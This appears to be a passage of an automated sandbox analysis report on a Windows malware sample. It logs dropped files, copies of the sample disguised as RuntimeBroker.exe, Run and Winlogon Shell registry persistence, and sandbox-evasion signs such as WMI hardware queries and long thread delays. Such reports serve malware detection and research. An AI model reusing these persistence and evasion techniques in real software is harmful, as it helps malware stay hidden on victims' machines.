                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\BKcXESYN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\yMEybVxl.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\tevppZXa.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\UPWuCoSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\aVrcADnQ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\bAMSHhIJ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\IeQwxcIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\QKxdLVJD.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\PTVdvIcA.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\dLiSHAoK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\RHZlgVYy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\cvDcQhTg.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\VMyCYnho.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DvHnLgjG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\nuBirctr.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File created: C:\Users\user\Desktop\DNOFZBcI.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File created: C:\Users\user\Desktop\xlsyLrRW.log

                      Boot Survival

                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Recovery\RuntimeBroker.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Memory allocated: 13F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Memory allocated: 1B080000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1AC80000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 690000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1A3B0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 11B0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1B0A0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: BF0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1A7A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Memory allocated: F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1A920000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: DB0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1A960000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 26A0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1A6A0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 2850000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1AB00000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 30C0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1B0C0000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1770000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1270000 memory reserve | memory write watch
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe Memory allocated: 1B130000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 5F0000 memory reserve | memory write watch
                      Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1A5A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599856
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599748
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599530
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599417
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599178
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 599023
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 3600000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 598719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 597406
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 596969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 596250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 596015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 594594
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 594250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 593875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 593734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 593437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 593140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 592781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 592199
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 591937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 591578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 591203
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 590656
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 590375
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 589437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 589140
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 588672
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 588312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 587946
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 587617
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 586703
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 586234
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 585875
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 585640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 585328
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 584969
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 584437
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 584091
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 583686
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 583297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 582812
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 582494
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 582187
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 581888
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 581544
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 581359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 581216
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 580969
